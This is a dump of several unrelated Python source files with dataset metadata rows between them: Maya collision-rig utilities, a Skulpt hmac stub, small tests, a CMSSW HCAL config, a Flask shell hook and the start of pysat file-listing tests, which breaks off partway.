raise Exception('Invalid collision distance axis! ('+str(distanceAxis)+')')
mc.connectAttr(collideDist+'.distance',distRemap+'.inputValue',f=True)
# Distance Weight
distMult = mc.createNode('multDoubleLinear',n=prefix+'_distanceWeight_multDoubleLinear')
mc.connectAttr(collidePlane+'.collideWeight',distMult+'.input1',f=True)
mc.connectAttr(distRemap+'.outValue',distMult+'.input2',f=True)
mc.connectAttr(distMult+'.output',collideBlend+'.blender',f=True)
# Set Distance Falloff
mc.setAttr(collidePlane+'.distanceFalloff',abs(distanceFalloff))
# =================
# - Return Result -
# =================
return [collidePlane,collideTransform]
def doublePlaneCollideTransform( targetTransform,
collidePlane1=None,
collidePlane2=None,
collideTransform=None,
offsetFalloff=None,
distanceFalloff=None,
distanceAxis='XY',
prefix=None):
'''
Setup a plane collide transform.
Setup includes smooth offset falloff, distance falloff and collide weight attributes.
Collision is based on the +Z axis of the collide plane transform.
@param targetTransform: Target transform (or locator) that the collide transform will follow.
@type targetTransform: str
@param collidePlane1: Collision plane 1 transform. If None, creant new renderRect plane.
@type collidePlane1: str or None
@param collidePlane2: Collision plane 2 transform. If None, creant new renderRect plane.
@type collidePlane2: str or None
@param collideTransform: Collide transform that will collide with the plane. If None, creant new locator.
@type collideTransform: str or None
@param offsetFalloff: Calculate collision offset falloff. Offset falloff is calculated as collision local Z distance.
@type offsetFalloff: float or None
@param distanceFalloff: Calculate collision distance falloff. Distance falloff is calculated as collision local XY distance.
@type distanceFalloff: float or None
@param prefix: Naming prefix. If None, extracted from targetTransform
@type prefix: str or None
'''
# ==========
# - Checks -
# ==========
# Check Target Transforms
if not mc.objExists(targetTransform):
raise Exception('Target transform "'+targetTransform+'" does not exist!')
if not glTools.utils.transform.isTransform(targetTransform):
raise Exception('Object "'+targetTransform+'" is not a valid transform!')
# Check Collide Transforms
if collideTransform and not mc.objExists(str(collideTransform)):
raise Exception('Collide transform "'+collideTransform+'" does not exist!')
if not glTools.utils.transform.isTransform(collideTransform):
raise Exception('Object "'+collideTransform+'" is not a valid transform!')
# Check Collide Plane
if collidePlane and not mc.objExists(str(collidePlane)):
raise Exception('Collide plane "'+collidePlane+'" does not exist!')
if not glTools.utils.transform.isTransform(collidePlane):
raise Exception('Object "'+collidePlane+'" is not a valid transform!')
# Check Distance Axis
if distanceAxis: distanceAxis = distanceAxis.upper()
# Check Prefix
if not prefix: prefix = glTools.utils.stringUtils.stripSuffix(targetTransform)
# ===================
# - Build Collision -
# ===================
# Build Collide Objects
if not collideTransform:
collideTransform = mc.spaceLocator(n=prefix+'_collide_loc')[0]
if not collidePlane:
collidePlaneShape = mc.createNode('renderRect')
collidePlane = mc.listRelatives(collidePlaneShape,p=True)[0]
collidePlane = mc.rename(collidePlane,prefix+'_collide_plane')
# Add Collide Attributes
if not mc.attributeQuery('collideWeight',n=collidePlane,ex=True):
mc.addAttr(collidePlane,ln='collideWeight',min=0,max=1,dv=1,k=True)
# Build Collide Nodes
collideCondition = mc.createNode('condition',n=prefix+'_collide_condition')
collideBlend = mc.createNode('blendColors',n=prefix+'_collideWeight_blendColors')
worldToCollide = mc.createNode('vectorProduct',n=prefix+'_worldToCollide_vectorProduct')
mc.setAttr(worldToCollide+'.operation',4) # Point Matrix Product
collideToWorld = mc.createNode('vectorProduct',n=prefix+'_collideToWorld_vectorProduct')
mc.setAttr(collideToWorld+'.operation',4) # Point Matrix Product
worldToLocal = mc.createNode('vectorProduct',n=prefix+'_worldToLocal_vectorProduct')
mc.setAttr(worldToLocal+'.operation',4) # Point Matrix Product
# =========================
# - Build Collide Network -
# =========================
# World To Collide
mc.connectAttr(collidePlane+'.worldInverseMatrix[0]',worldToCollide+'.matrix',f=True)
if mc.objExists(targetTransform+'.worldPosition[0]'):
mc.connectAttr(targetTransform+'.worldPosition[0]',worldToCollide+'.input1',f=True)
else:
localToWorld = mc.createNode('vectorProduct',n=prefix+'_localToWorld_vectorProduct')
mc.setAttr(localToWorld+'.operation',4) # Point Matrix Product
mc.connectAttr(targetTransform+'.worldMatrix[0]',localToWorld+'.matrix',f=True)
mc.connectAttr(localToWorld+'.output',worldToCollide+'.input1',f=True)
# Collide Condition
mc.connectAttr(worldToCollide+'.outputZ',collideCondition+'.firstTerm',f=True)
mc.setAttr(collideCondition+'.secondTerm',0)
mc.setAttr(collideCondition+'.operation',2) # Greater Than
mc.connectAttr(worldToCollide+'.output',collideCondition+'.colorIfTrue',f=True)
mc.connectAttr(worldToCollide+'.outputX',collideCondition+'.colorIfFalseR',f=True)
mc.connectAttr(worldToCollide+'.outputY',collideCondition+'.colorIfFalseG',f=True)
mc.setAttr(collideCondition+'.colorIfFalseB',0)
# Collide Weight Blend
mc.connectAttr(collideCondition+'.outColor',collideBlend+'.color1',f=True)
mc.connectAttr(worldToCollide+'.output',collideBlend+'.color2',f=True)
mc.connectAttr(collidePlane+'.collideWeight',collideBlend+'.blender',f=True)
# Collide To World
mc.connectAttr(collideBlend+'.output',collideToWorld+'.input1',f=True)
mc.connectAttr(collidePlane+'.worldMatrix[0]',collideToWorld+'.matrix',f=True)
# World To Local
mc.connectAttr(collideToWorld+'.output',worldToLocal+'.input1',f=True)
mc.connectAttr(collideTransform+'.parentInverseMatrix[0]',worldToLocal+'.matrix',f=True)
# Connect Output
mc.connectAttr(worldToLocal+'.output',collideTransform+'.translate',f=True)
# ============================
# - Calculate Offset Falloff -
# ============================
if offsetFalloff != None:
# Add Collide Attributes
if not mc.attributeQuery('offsetFalloff',n=collidePlane,ex=True):
mc.addAttr(collidePlane,ln='offsetFalloff',min=0,dv=0.5,k=True)
# Build Nodes
falloffRemap = mc.createNode('remapValue',n=prefix+'_offsetFalloff_remapValue')
falloffMult = mc.createNode('multDoubleLinear',n=prefix+'_offsetFalloff_multDoubleLinear')
# Falloff Remap
mc.connectAttr(worldToCollide+'.outputZ',falloffRemap+'.inputValue',f=True)
mc.connectAttr(collidePlane+'.offsetFalloff',falloffRemap+'.inputMax',f=True)
mc.connectAttr(collidePlane+'.offsetFalloff',falloffRemap+'.outputMax',f=True)
mc.connectAttr(collidePlane+'.offsetFalloff',falloffMult+'.input1',f=True)
mc.setAttr(falloffMult+'.input2',-1)
mc.connectAttr(falloffMult+'.output',falloffRemap+'.inputMin',f=True)
# Override Collide Condition
mc.connectAttr(collidePlane+'.offsetFalloff',collideCondition+'.secondTerm',f=True)
mc.connectAttr(falloffRemap+'.outValue',collideCondition+'.colorIfFalseB',f=True)
# Set Offset Falloff
mc.setAttr(collidePlane+'.offsetFalloff',abs(offsetFalloff))
# ==============================
# - Calculate Distance Falloff -
# ==============================
if distanceFalloff != None:
# Add Collide Attributes
if not mc.attributeQuery('distanceFalloff',n=collidePlane,ex=True):
mc.addAttr(collidePlane,ln='distanceFalloff',min=0,dv=1,k=True)
# Distance Remap
distRemap = mc.createNode('remapValue',n=prefix+'_collideDist_remapValue')
mc.connectAttr(collidePlane+'.distanceFalloff',distRemap+'.inputMax',f=True)
mc.setAttr(distRemap+'.outputMin',1)
mc.setAttr(distRemap+'.outputMax',0)
mc.setAttr(distRemap+'.inputMin',0)
# Distance Falloff
collideDist = mc.createNode('distanceBetween',n=prefix+'_collideDist_distanceBetween')
if len(distanceAxis) == 1:
mc.connectAttr(worldToCollide+'.output'+distanceAxis[0],collideDist+'.point1X',f=True)
elif len(distanceAxis) == 2:
mc.connectAttr(worldToCollide+'.output'+distanceAxis[0],collideDist+'.point1X',f=True)
mc.connectAttr(worldToCollide+'.output'+distanceAxis[1],collideDist+'.point1Y',f=True)
else:
raise Exception('Invalid collision distance axis! ('+str(distanceAxis)+')')
mc.connectAttr(collideDist+'.distance',distRemap+'.inputValue',f=True)
# Distance Weight
distMult = mc.createNode('multDoubleLinear',n=prefix+'_distanceWeight_multDoubleLinear')
mc.connectAttr(collidePlane+'.collideWeight',distMult+'.input1',f=True)
mc.connectAttr(distRemap+'.outValue',distMult+'.input2',f=True)
mc.connectAttr(distMult+'.output',collideBlend+'.blender',f=True)
# Set Distance Falloff
mc.setAttr(collidePlane+'.distanceFalloff',abs(distanceFalloff))
# =================
# - Return Result -
# =================
return
def surfaceCollideTransform(targetTransform,slaveTransform,collideSurface,inside=True,prefix=''):
'''
'''
# ==========
# - Checks -
# ==========
if not mc.objExists(targetTransform):
raise Exception('Target transform "'+targetTransform+'" does not exist!')
if not mc.objExists(slaveTransform):
raise Exception('Slave transform "'+slaveTransform+'" does not exist!')
if not mc.objExists(collideSurface):
raise Exception('Collide surface "'+collideSurface+'" does not exist!')
if not glTools.utils.surface.isSurface(collideSurface):
raise Exception('Collide object "'+collideSurface+'" is not a valid NURBS surface!')
if not prefix: prefix = 'collideSurface'
# ===================
# - Create Locators -
# ===================
slave_loc = mc.spaceLocator(n=slaveTransform+'_loc')[0]
target_loc = mc.spaceLocator(n=targetTransform+'_loc')[0]
target_ptCon = mc.pointConstraint(targetTransform,target_loc)[0]
# - Setup -
con = mc.createNode('condition',n=prefix+'_condition')
vp = mc.createNode('vectorProduct',n=prefix+'_vectorProduct')
pma = mc.createNode('plusMinusAverage',n=prefix+'_plusMinusAverage')
posi = mc.createNode('pointOnSurfaceInfo',n=prefix+'_pointOnSurfaceInfo')
cpos = mc.createNode('closestPointOnSurface',n=prefix+'_closestPointOnSurface')
# Surface Connect
mc.connectAttr(collideSurface+'.worldSpace[0]',posi+'.inputSurface',f=True)
mc.connectAttr(collideSurface+'.worldSpace[0]',cpos+'.inputSurface',f=True)
mc.connectAttr(target_loc+'.worldPosition[0]',cpos+'.inPosition',f=True)
# Parameter Connect
mc.connectAttr(cpos+'.parameterU',posi+'.parameterU',f=True)
mc.connectAttr(cpos+'.parameterV',posi+'.parameterV',f=True)
# Offset Calc
mc.setAttr(pma+'.operation',2) # SUBTRACT
mc.connectAttr(target_loc+'.worldPosition[0]',pma+'.input3D[0]',f=True)
mc.connectAttr(cpos+'.position',pma+'.input3D[1]',f=True)
# Dot Product
mc.setAttr(vp+'.operation',1) # DOT PRODUCT
mc.connectAttr(posi+'.normal',vp+'.input1',f=True)
mc.connectAttr(pma+'.output3D',vp+'.input2',f=True)
# Condition
if inside: mc.setAttr(con+'.operation',2) # Greater Than
else: mc.setAttr(con+'.operation',4) # Less Than
mc.setAttr(con+'.firstTerm',0.0)
mc.connectAttr(vp+'.outputX',con+'.secondTerm',f=True)
mc.connectAttr(target_loc+'.worldPosition[0]',con+'.colorIfTrue',f=True)
mc.connectAttr(cpos+'.position',con+'.colorIfFalse',f=True)
# Output
mc.connectAttr(con+'.outColor',slave_loc+'.t',f=True)
return target_loc, slave_loc
| 42.562771 | 125 | 0.734693 | 2,138 | 19,664 | 6.724977 | 0.100561 | 0.067812 | 0.020935 | 0.043817 | 0.884198 | 0.867367 | 0.86069 | 0.855961 | 0.841285 | 0.841285 | 0 | 0.006754 | 0.104048 | 19,664 | 461 | 126 | 42.655098 | 0.809343 | 0.222996 | 0 | 0.77686 | 0 | 0 | 0.251339 | 0.04544 | 0 | 0 | 0 | 0 | 0 | 1 | 0.020661 | false | 0.008264 | 0.016529 | 0 | 0.049587 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c295c1b7e5981035158a096f9a58f246faffc1bf | 36 | py | Python | src/lib/hmac.py | DTenore/skulpt | 098d20acfb088d6db85535132c324b7ac2f2d212 | [
"MIT"
] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | src/lib/hmac.py | wakeupmuyunhe/skulpt | a8fb11a80fb6d7c016bab5dfe3712517a350b347 | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | src/lib/hmac.py | wakeupmuyunhe/skulpt | a8fb11a80fb6d7c016bab5dfe3712517a350b347 | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | import _sk_fail; _sk_fail._("hmac")
| 18 | 35 | 0.75 | 6 | 36 | 3.666667 | 0.666667 | 0.545455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 36 | 1 | 36 | 36 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
c295f1f7c597ac393b252e748ad0502c7a87c298 | 791 | py | Python | tests/test_utils.py | sladkovm/Velometria.py | 22c97723f3b5ba5342a6178535f48cc426daac2f | [
"MIT"
] | 2 | 2016-09-04T09:26:03.000Z | 2017-07-27T05:52:06.000Z | tests/test_utils.py | sladkovm/Velometria.py | 22c97723f3b5ba5342a6178535f48cc426daac2f | [
"MIT"
] | 4 | 2016-08-03T17:54:12.000Z | 2016-08-09T20:11:45.000Z | tests/test_utils.py | sladkovm/Velometria_py | 22c97723f3b5ba5342a6178535f48cc426daac2f | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
from vmpy.utils import cast_array_to_original_type
def test_cast_array_to_original_type():
arg = [0, 0, 0]
rv = cast_array_to_original_type(np.array(arg), type(arg))
assert type(rv) == type(arg)
rv = cast_array_to_original_type(pd.Series(arg), type(arg))
assert type(rv) == type(arg)
arg = np.array([0, 0, 0])
rv = cast_array_to_original_type(list(arg), type(arg))
assert type(rv) == type(arg)
rv = cast_array_to_original_type(pd.Series(arg), type(arg))
assert type(rv) == type(arg)
arg = pd.Series([0, 0, 0])
rv = cast_array_to_original_type(list(arg), type(arg))
assert type(rv) == type(arg)
rv = cast_array_to_original_type(np.array(arg), type(arg))
assert type(rv) == type(arg) | 26.366667 | 63 | 0.671302 | 134 | 791 | 3.716418 | 0.164179 | 0.182731 | 0.176707 | 0.305221 | 0.849398 | 0.757028 | 0.757028 | 0.757028 | 0.757028 | 0.751004 | 0 | 0.013975 | 0.185841 | 791 | 30 | 64 | 26.366667 | 0.759317 | 0 | 0 | 0.631579 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.315789 | 1 | 0.052632 | false | 0 | 0.157895 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c2a141af2cc9758a9351ccc82614f980159608a1 | 126 | py | Python | submission_form/models/__init__.py | NAKKA-K/degifarm | 63d74b1206860d0d2213efbc8a7969be7976c4fd | [
"MIT"
] | null | null | null | submission_form/models/__init__.py | NAKKA-K/degifarm | 63d74b1206860d0d2213efbc8a7969be7976c4fd | [
"MIT"
] | 6 | 2018-02-18T08:38:46.000Z | 2018-02-21T09:19:21.000Z | submission_form/models/__init__.py | NAKKA-K/dw2018_server | 63d74b1206860d0d2213efbc8a7969be7976c4fd | [
"MIT"
] | null | null | null | from submission_form.models.info import *
from submission_form.models.user import *
from submission_form.models.task import *
| 31.5 | 41 | 0.833333 | 18 | 126 | 5.666667 | 0.444444 | 0.411765 | 0.529412 | 0.705882 | 0.588235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.095238 | 126 | 3 | 42 | 42 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
c2b96116d7674d175e9caf31ac41c991de160386 | 1,526 | py | Python | RecoLocalCalo/HcalRecProducers/python/HBHEStatusBitSetter_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 852 | 2015-01-11T21:03:51.000Z | 2022-03-25T21:14:00.000Z | RecoLocalCalo/HcalRecProducers/python/HBHEStatusBitSetter_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 30,371 | 2015-01-02T00:14:40.000Z | 2022-03-31T23:26:05.000Z | RecoLocalCalo/HcalRecProducers/python/HBHEStatusBitSetter_cfi.py | ckamtsikis/cmssw | ea19fe642bb7537cbf58451dcf73aa5fd1b66250 | [
"Apache-2.0"
] | 3,240 | 2015-01-02T05:53:18.000Z | 2022-03-31T17:24:21.000Z | import FWCore.ParameterSet.Config as cms
qie8Config = cms.PSet(nominalPedestal=cms.double(3.0), #fC
hitEnergyMinimum=cms.double(1.0), #GeV
hitMultiplicityThreshold=cms.int32(17),
pulseShapeParameterSets = cms.VPSet(
cms.PSet(pulseShapeParameters=cms.vdouble( 0.0, 100.0, -50.0, 0.0, -15.0, 0.15)),
cms.PSet(pulseShapeParameters=cms.vdouble( 100.0, 2.0e3, -50.0, 0.0, -5.0, 0.05)),
cms.PSet(pulseShapeParameters=cms.vdouble( 2.0e3, 1.0e6, -50.0, 0.0, 95.0, 0.0 )),
cms.PSet(pulseShapeParameters=cms.vdouble(-1.0e6, 1.0e6, 45.0, 0.1, 1.0e6, 0.0 )),
)
)
# For now, QIE11 parameters duplicate those of QIE8. To be tuned.
qie11Config = cms.PSet(nominalPedestal=cms.double(3.0), #fC
hitEnergyMinimum=cms.double(1.0), #GeV
hitMultiplicityThreshold=cms.int32(17),
pulseShapeParameterSets = cms.VPSet(
cms.PSet(pulseShapeParameters=cms.vdouble( 0.0, 100.0, -50.0, 0.0, -15.0, 0.15)),
cms.PSet(pulseShapeParameters=cms.vdouble( 100.0, 2.0e3, -50.0, 0.0, -5.0, 0.05)),
cms.PSet(pulseShapeParameters=cms.vdouble( 2.0e3, 1.0e6, -50.0, 0.0, 95.0, 0.0 )),
cms.PSet(pulseShapeParameters=cms.vdouble(-1.0e6, 1.0e6, 45.0, 0.1, 1.0e6, 0.0 )),
)
)
| 61.04 | 109 | 0.528178 | 197 | 1,526 | 4.091371 | 0.228426 | 0.064516 | 0.26799 | 0.297767 | 0.868486 | 0.868486 | 0.868486 | 0.868486 | 0.868486 | 0.868486 | 0 | 0.149515 | 0.325033 | 1,526 | 24 | 110 | 63.583333 | 0.63301 | 0.048493 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.047619 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c2d297aca2a0fb0b2200835ebd333c894b9d59d6 | 154 | py | Python | runp.py | Zyntab/npc | 59ecdfed1c4b4fbad576bb4708e7cfa959649246 | [
"MIT"
] | null | null | null | runp.py | Zyntab/npc | 59ecdfed1c4b4fbad576bb4708e7cfa959649246 | [
"MIT"
] | 1 | 2021-06-01T21:44:05.000Z | 2021-06-01T21:44:05.000Z | runp.py | viktoralmen/npc | 59ecdfed1c4b4fbad576bb4708e7cfa959649246 | [
"MIT"
] | null | null | null | #! /usr/bin/python
from app import app
@app.shell_context_processor
def make_shell_context():
return {'db': db, 'User': User, 'Character': Character} | 25.666667 | 59 | 0.720779 | 22 | 154 | 4.863636 | 0.681818 | 0.224299 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12987 | 154 | 6 | 59 | 25.666667 | 0.798507 | 0.11039 | 0 | 0 | 0 | 0 | 0.109489 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
6c6caad287b6015924b1e52cba2ef3ee41e3a5ba | 45,371 | py | Python | pysat/tests/test_files.py | jklenzing/pysat | e84002e57f8a808d35562f51ce957361d99c4070 | [
"BSD-3-Clause"
] | null | null | null | pysat/tests/test_files.py | jklenzing/pysat | e84002e57f8a808d35562f51ce957361d99c4070 | [
"BSD-3-Clause"
] | 1 | 2020-01-30T02:35:32.000Z | 2020-01-30T02:35:32.000Z | pysat/tests/test_files.py | jklenzing/pysat | e84002e57f8a808d35562f51ce957361d99c4070 | [
"BSD-3-Clause"
] | 1 | 2020-01-30T01:46:31.000Z | 2020-01-30T01:46:31.000Z | """
tests the pysat meta object and code
"""
import glob
import numpy as np
import os
import sys
from nose.tools import raises
import pandas as pds
import tempfile
import pysat
import pysat.instruments.pysat_testing
if sys.version_info[0] >= 3:
from importlib import reload as re_load
else:
re_load = reload
def create_dir(inst=None, temporary_file_list=False):
if inst is None:
# create instrument
inst = pysat.Instrument(platform='pysat', name='testing',
temporary_file_list=temporary_file_list)
# create data directories
try:
os.makedirs(inst.files.data_path)
except OSError:
pass
return
def remove_files(inst=None):
# remove any files
temp_dir = inst.files.data_path
for the_file in os.listdir(temp_dir):
if (the_file[0:13] == 'pysat_testing') & \
(the_file[-19:] == '.pysat_testing_file'):
file_path = os.path.join(temp_dir, the_file)
if os.path.isfile(file_path):
os.unlink(file_path)
# create year doy file set
def create_files(inst, start, stop, freq=None, use_doy=True, root_fname=None, content = None):
if freq is None:
freq = '1D'
dates = pysat.utils.time.create_date_range(start, stop, freq=freq)
if root_fname is None:
root_fname = ''.join(('pysat_testing_junk_{year:04d}_gold_{day:03d}_',
'stuff.pysat_testing_file'))
# create empty file
for date in dates:
yr, doy = pysat.utils.time.getyrdoy(date)
if use_doy:
doy = doy
else:
doy = date.day
fname = os.path.join(inst.files.data_path, root_fname.format(year=yr,
day=doy, month=date.month, hour=date.hour,
minute=date.minute, second=date.second))
with open(fname, 'w') as f:
if content is not None:
f.write(content)
def list_files(tag=None, sat_id=None, data_path=None, format_str=None):
"""Return a Pandas Series of every file for chosen satellite data"""
if format_str is None:
format_str = ''.join(('pysat_testing_junk_{year:04d}_gold_{day:03d}_',
'stuff_{month:02d}_{hour:02d}_{minute:02d}_',
'{second:02d}.pysat_testing_file'))
if tag is not None:
if tag == '':
return pysat.Files.from_os(data_path=data_path,
format_str=format_str)
else:
raise ValueError('Unrecognized tag name')
else:
raise ValueError('A tag name must be passed ')
class TestNoDataDir():
def __init__(self, temporary_file_list=False):
self.temporary_file_list = temporary_file_list
def setup(self):
"""Runs before every method to create a clean testing setup."""
# store current pysat directory
self.saved_data_path = pysat.data_dir
pysat.data_dir = ''
re_load(pysat._files)
def teardown(self):
"""Runs after every method to clean up previous testing."""
pysat.data_dir = self.saved_data_path
re_load(pysat._files)
@raises(Exception)
def test_no_data_dir(self):
inst = pysat.Instrument()
class TestBasics():
def __init__(self, temporary_file_list=False):
self.temporary_file_list = temporary_file_list
def setup(self):
"""Runs before every method to create a clean testing setup."""
# store current pysat directory
self.data_path = pysat.data_dir
# create temporary directory
dir_name = tempfile.mkdtemp()
pysat.utils.set_data_dir(dir_name, store=False)
self.testInst = \
pysat.Instrument(inst_module=pysat.instruments.pysat_testing,
clean_level='clean',
temporary_file_list=self.temporary_file_list)
# create testing directory
create_dir(self.testInst)
def teardown(self):
"""Runs after every method to clean up previous testing."""
remove_files(self.testInst)
try:
pysat.utils.set_data_dir(self.data_path, store=False)
except:
pass
del self.testInst
def test_parse_delimited_filename(self):
"""Check ability to parse delimited files"""
# Note: Can be removed if future instrument that uses delimited
# filenames is added to routine travis end-to-end testing
fname = ''.join(('test_{year:4d}_{month:2d}_{day:2d}_{hour:2d}',
'_{minute:2d}_{second:2d}_v01_r02.cdf'))
year = np.ones(6)*2009
month = np.ones(6)*12
day = np.array([12, 15, 17, 19, 22, 24])
hour = np.array([8, 10, 6, 18, 3, 23])
minute = np.array([8, 10, 6, 18, 3, 59])
second = np.array([58, 11, 26, 2, 18, 59])
file_list = []
for i in range(6):
file_list.append(fname.format(year=year[i].astype(int),
month=month[i].astype(int),
day=day[i], hour=hour[i],
minute=minute[i], second=second[i]))
file_dict = pysat._files.parse_delimited_filenames(file_list, fname,
'_')
assert np.all(file_dict['year'] == year)
assert np.all(file_dict['month'] == month)
assert np.all(file_dict['day'] == day)
assert np.all(file_dict['hour'] == hour)
assert np.all(file_dict['minute'] == minute)
assert np.all(file_dict['day'] == day)
assert (file_dict['version'] is None)
assert (file_dict['revision'] is None)
def test_year_doy_files_direct_call_to_from_os(self):
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2009, 12, 31)
create_files(self.testInst, start, stop, freq='1D')
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=''.join(('pysat_testing_junk_',
'{year:04d}_gold_',
'{day:03d}_stuff.',
'pysat_testing_file')))
# check overall length
check1 = len(files) == (365 + 366)
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[365]) == \
pysat.datetime(2008, 12, 31)
check4 = pds.to_datetime(files.index[-1]) == \
pysat.datetime(2009, 12, 31)
assert(check1 & check2 & check3 & check4)
def test_year_doy_files_no_gap_in_name_direct_call_to_from_os(self):
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2009, 12, 31)
create_files(self.testInst, start, stop, freq='1D',
root_fname=''.join(('pysat_testing_junk_{year:04d}',
'{day:03d}_stuff.pysat_testing_',
'file')))
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=''.join(('pysat_testing_junk_',
'{year:04d}{day:03d}_',
'stuff.pysat_testing_',
'file')))
# check overall length
check1 = len(files) == (365 + 366)
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[365]) == \
pysat.datetime(2008, 12, 31)
check4 = pds.to_datetime(files.index[-1]) == \
pysat.datetime(2009, 12, 31)
assert(check1 & check2 & check3 & check4)
def test_year_month_day_files_direct_call_to_from_os(self):
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2009, 12, 31)
create_files(self.testInst, start, stop, freq='1D', use_doy=False,
root_fname=''.join(('pysat_testing_junk_{year:04d}_gold_',
'{day:03d}_stuff_{month:02d}.pysat_',
'testing_file')))
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=''.join(('pysat_testing_junk_',
'{year:04d}_gold_',
'{day:03d}_stuff_',
'{month:02d}.pysat_',
'testing_file')))
# check overall length
check1 = len(files) == (365 + 366)
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[365]) == \
pysat.datetime(2008, 12, 31)
check4 = pds.to_datetime(files.index[-1]) == \
pysat.datetime(2009, 12, 31)
assert(check1 & check2 & check3 & check4)
def test_year_month_day_hour_files_direct_call_to_from_os(self):
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2009, 12, 31)
create_files(self.testInst, start, stop, freq='6h',
use_doy=False,
root_fname=''.join(('pysat_testing_junk_{year:04d}_gold_',
'{day:03d}_stuff_{month:02d}_',
'{hour:02d}.pysat_testing_file')))
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=''.join(('pysat_testing_junk_',
'{year:04d}_gold_',
'{day:03d}_stuff_',
'{month:02d}_',
'{hour:02d}.pysat_',
'testing_file')))
# check overall length
check1 = len(files) == (365+366)*4-3
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[1460]) == \
pysat.datetime(2008, 12, 31)
check4 = pds.to_datetime(files.index[-1]) == \
pysat.datetime(2009, 12, 31)
assert(check1 & check2 & check3 & check4)
def test_year_month_day_hour_minute_files_direct_call_to_from_os(self):
root_fname = ''.join(('pysat_testing_junk_{year:04d}_gold_{day:03d}_',
'stuff_{month:02d}_{hour:02d}{minute:02d}.',
'pysat_testing_file'))
# create a bunch of files by year and doy
start = pysat.datetime(2008, 1, 1)
stop = pysat.datetime(2008, 1, 4)
create_files(self.testInst, start, stop, freq='30min',
use_doy=False,
root_fname=root_fname)
# use from_os function to get pandas Series of files and dates
files = pysat.Files.from_os(data_path=self.testInst.files.data_path,
format_str=root_fname)
# check overall length
check1 = len(files) == 145
# check specific dates
check2 = pds.to_datetime(files.index[0]) == pysat.datetime(2008, 1, 1)
check3 = pds.to_datetime(files.index[1]) == \
pysat.datetime(2008, 1, 1, 0, 30)
check4 = pds.to_datetime(files.index[10]) == \
